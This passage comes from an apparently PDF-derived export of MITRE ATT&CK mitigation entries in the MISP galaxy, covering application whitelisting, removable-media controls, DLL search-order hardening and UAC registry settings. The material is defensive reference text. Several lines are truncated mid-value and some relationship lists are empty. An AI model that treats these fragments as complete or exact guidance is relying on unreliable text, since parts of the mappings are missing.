• mitigates: misp-galaxy:mitre-attack-pattern="Emond - T1519" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001" with estimative-language:likelihood-probability="almost-certain"

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• mitigates: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"
Table 3871. Table References

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<td><a href="https://attack.mitre.org/mitigations/M1042">https://attack.mitre.org/mitigations/M1042</a></td>
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**Limit Access to Resource Over Network - M1035**

Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

The tag is: `misp-galaxy:mitre-course-of-action="Limit Access to Resource Over Network - M1035"`

Limit Access to Resource Over Network - M1035 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Man-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Container API - T1552.007" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613" with estimative-language:likelihood-probability="almost-certain"

Table 3872. Table References

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**Data from Network Shared Drive Mitigation - T1039**

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from a network share, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Network Shared Drive Mitigation - T1039"

Data from Network Shared Drive Mitigation - T1039 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

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1766
**Windows Management Instrumentation Event Subscription Mitigation - T1084**

Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)

The tag is: `misp-galaxy:mitre-course-of-action="Windows Management Instrumentation Event Subscription Mitigation - T1084"`

Windows Management Instrumentation Event Subscription Mitigation - T1084 has relationships with:


**Custom Command and Control Protocol Mitigation - T1094**

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such
a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Custom Command and Control Protocol Mitigation - T1094"

Custom Command and Control Protocol Mitigation - T1094 has relationships with:


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**Image File Execution Options Injection Mitigation - T1183**

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all IFEO will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. (Citation: Microsoft IFEOorMalware July 2015) Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Identify and block potentially malicious software that may be executed through IFEO by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executables.

The tag is: misp-galaxy:mitre-course-of-action="Image File Execution Options Injection Mitigation - T1183"

Image File Execution Options Injection Mitigation - T1183 has relationships with:


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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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</table>
SIP and Trust Provider Hijacking Mitigation - T1198

Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Also ensure that these values contain their full path to prevent [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). (Citation: SpectorOps Subverting Trust Sept 2017)

Consider removing unnecessary and/or stale SIPs. (Citation: SpectorOps Subverting Trust Sept 2017)

Restrict storage and execution of SIP DLLs to protected directories, such as C:\Windows, rather than user directories.

Enable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.

The tag is: `misp-galaxy:mitre-course-of-action="SIP and Trust Provider Hijacking Mitigation - T1198"`

SIP and Trust Provider Hijacking Mitigation - T1198 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198"` with `estimative-language:likelihood-probability="almost-certain"

Table 3877. Table References

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<td><a href="https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf">https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf</a></td>
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</table>

Standard Non-Application Layer Protocol Mitigation - T1095

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: `misp-galaxy:mitre-course-of-action="Standard Non-Application Layer Protocol Mitigation - T1095"`
Standard Non-Application Layer Protocol Mitigation - T1095 has relationships with:


### Table 3878. Table References

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### Deobfuscate/Decode Files or Information Mitigation - T1140

Identify unnecessary system utilities or potentially malicious software that may be used to deobfuscate or decode files or information, and audit and/or block them by using whitelisting tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Deobfuscate/Decode Files or Information Mitigation - T1140"

Deobfuscate/Decode Files or Information Mitigation - T1140 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

### Table 3879. Table References

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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</table>
Deploy Compromised Device Detection Method - M1010

A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. Some methods may be trivial to evade while others may be more sophisticated.

The tag is: misp-galaxy:mitre-course-of-action="Deploy Compromised Device Detection Method - M1010"

Deploy Compromised Device Detection Method - M1010 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1579" with estimative-language:likelihood-probability="almost-certain"

Table 3880. Table References

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<td><a href="https://attack.mitre.org/mitigations/M1010">https://attack.mitre.org/mitigations/M1010</a></td>
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</table>

Data Transfer Size Limits Mitigation - T1030

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Transfer Size Limits Mitigation - T1030"

Data Transfer Size Limits Mitigation - T1030 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

Table 3881. Table References

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</table>

1771
Data from Local System Mitigation - T1005

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from the local system, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Local System Mitigation - T1005"

Data from Local System Mitigation - T1005 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 3882. Table References

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<td><a href="http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599">http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</a></td>
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<tr>
<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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</table>

File System Logical Offsets Mitigation - T1006

Identify potentially malicious software that may be used to access logical drives in this manner, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File System Logical Offsets Mitigation - T1006"

File System Logical Offsets Mitigation - T1006 has relationships with:


Table 3883. Table References

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<td><a href="https://attack.mitre.org/mitigations/T1006">https://attack.mitre.org/mitigations/T1006</a></td>
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1772
Caution with Device Administrator Access - M1007

Warn device users not to accept requests to grant Device Administrator access to applications without good reason.

Additionally, application vetting should include a check on whether the application requests Device Administrator access. Applications that do request Device Administrator access should be carefully scrutinized and only allowed to be used if a valid reason exists.

The tag is: `misp-galaxy:mitre-course-of-action="Caution with Device Administrator Access - M1007"`

Caution with Device Administrator Access - M1007 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Device Lockout - T1446"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447"` with estimative-language:likelihood-probability="almost-certain"

Table 3884. Table References

Links

https://attack.mitre.org/mitigations/M1007

Indicator Removal on Host Mitigation - T1070

Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities. Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.

The tag is: `misp-galaxy:mitre-course-of-action="Indicator Removal on Host Mitigation - T1070"`

Indicator Removal on Host Mitigation - T1070 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"` with estimative-language:likelihood-probability="almost-certain"
Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods. Minimize available services to only those that are necessary. Regularly scan the internal network for available services to identify new and potentially vulnerable services. Minimize permissions and access for service accounts to limit impact of exploitation.

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.

The tag is: *misp-galaxy:mitre-course-of-action="Exploitation of Remote Services Mitigation - T1210"*

Exploitation of Remote Services Mitigation - T1210 has relationships with:


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</table>
System Network Configuration Discovery Mitigation - T1016

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about a system's network configuration, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Network Configuration Discovery Mitigation - T1016"

System Network Configuration Discovery Mitigation - T1016 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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Replication Through Removable Media Mitigation - T1091

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)

Identify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet
Applocker vs SRP

The tag is: misp-galaxy:mitre-course-of-action="Replication Through Removable Media Mitigation - T1091"

Replication Through Removable Media Mitigation - T1091 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

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Restrict File and Directory Permissions - M1022

Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

The tag is: misp-galaxy:mitre-course-of-action="Restrict File and Directory Permissions - M1022"

Restrict File and Directory Permissions - M1022 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073" with estimative-
- mitigates: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1494" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Startup Items - T1165" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Plist Modification - T1150" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1096" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-
• mitigates: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1492" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Logon Script (Mac) - T1037.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Logon Script - T1037.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Startup Items - T1037.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-


- mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"


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- mitigates: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003" with estimative-language:likelihood-probability="almost-certain"


- mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"

- mitigates: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking -
Exploitation for Client Execution Mitigation - T1203

Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.
The tag is: `misp-galaxy:mitre-course-of-action="Exploitation for Client Execution Mitigation - T1203"`

Exploitation for Client Execution Mitigation - T1203 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"` with estimative-language:likelihood-probability="almost-certain"

**Table 3890. Table References**

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<td><a href="https://en.wikipedia.org/wiki/Control-flow_integrity">https://en.wikipedia.org/wiki/Control-flow_integrity</a></td>
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**Change Default File Association Mitigation - T1042**

Direct mitigation of this technique is not recommended since it is a legitimate function that can be performed by users for software preferences. Follow Microsoft's best practices for file associations. (Citation: MSDN File Associations)

Identify and block potentially malicious software that may be executed by this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS App Locker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="Change Default File Association Mitigation - T1042"`

Change Default File Association Mitigation - T1042 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001"` with estimative-language:likelihood-probability="almost-certain"

**Table 3891. Table References**

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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</table>
Data from Removable Media Mitigation - T1025

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Removable Media Mitigation - T1025"

Data from Removable Media Mitigation - T1025 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

Table 3892. Table References

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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Exfiltration Over Physical Medium Mitigation - T1052

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Physical Medium Mitigation - T1052"

Exfiltration Over Physical Medium Mitigation - T1052 has relationships with:

Communication Through Removable Media Mitigation - T1092

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)

The tag is: `misp-galaxy:mitre-course-of-action="Communication Through Removable Media Mitigation - T1092"`

Communication Through Removable Media Mitigation - T1092 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092"` with estimative-language:likelihood-probability="almost-certain"

File and Directory Discovery Mitigation - T1083

File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="File and Directory Discovery Mitigation - T1083"`

File and Directory Discovery Mitigation - T1083 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
### DLL Search Order Hijacking Mitigation - T1038

Disallow loading of remote DLLs. (Citation: Microsoft DLL Preloading) This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+. (Citation: Microsoft DLL Search) Path Algorithm

Enable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions (e.g. `<code>%SYSTEMROOT%</code>`) to be used before local directory DLLs (e.g. a user's home directory). The Safe DLL Search Mode can be enabled via Group Policy at Computer Configuration > [Policies] > Administrative Templates > MSS (Legacy): MSS (SafeDllSearchMode)

Enable Safe DLL search mode. The associated Windows Registry key for this is located at `<code>HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode</code>` (Citation: Microsoft DLL Search)

Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses. (Citation: Powersploit)

Identify and block potentially malicious software that may be executed through search order hijacking by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: `misp-galaxy:mitre-course-of-action="DLL Search Order Hijacking Mitigation - T1038"`

DLL Search Order Hijacking Mitigation - T1038 has relationships with:


Table 3896. Table References

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</table>
File System Permissions Weakness Mitigation - T1044

Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses. (Citation: Powersploit)

Identify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able. (Citation: Seclists Kanthak 7zip Installer)

Turn off UAC's privilege elevation for standard users with:
<code>
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
to automatically deny elevation requests, add:
"ConsentPromptBehaviorUser"=dword:00000000
</code> (Citation: Seclists Kanthak 7zip Installer). Consider enabling installer detection for all users by adding:
<code>"EnableInstallerDetection"=dword:00000001</code>. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add:
<code>"EnableInstallerDetection"=dword:00000000</code>. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.

The tag is: misp-galaxy:mitre-course-of-action="File System Permissions Weakness Mitigation - T1044"

File System Permissions Weakness Mitigation - T1044 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044" with estimative-language:likelihood-probability="almost-certain"

Table 3897. Table References

**Links**

- https://attack.mitre.org/mitigations/T1044
- https://github.com/mattifestation/PowerSploit
System Network Connections Discovery Mitigation - T1049

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about network connections, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Network Connections Discovery Mitigation - T1049"

System Network Connections Discovery Mitigation - T1049 has relationships with:


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Service Registry Permissions Weakness Mitigation - T1058

Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands
JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.

The tag is: *misp-galaxy:mitre-course-of-action*="Service Registry Permissions Weakness Mitigation - T1058"

Service Registry Permissions Weakness Mitigation - T1058 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern*="Service Registry Permissions Weakness - T1058" with estimative-language:likelihood-probability="almost-certain"

### Indicator Removal from Tools Mitigation - T1066

Mitigation is difficult in instances like this because the adversary may have access to the system through another channel and can learn what techniques or tools are blocked by resident defenses. Exercising best practices with configuration and security as well as ensuring that proper process is followed during investigation of potential compromise is essential to detecting a larger intrusion through discrete alerts.

Identify and block potentially malicious software that may be used by an adversary by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action*="Indicator Removal from Tools Mitigation - T1066"

Indicator Removal from Tools Mitigation - T1066 has relationships with:

Exploitation for Privilege Escalation Mitigation - T1068

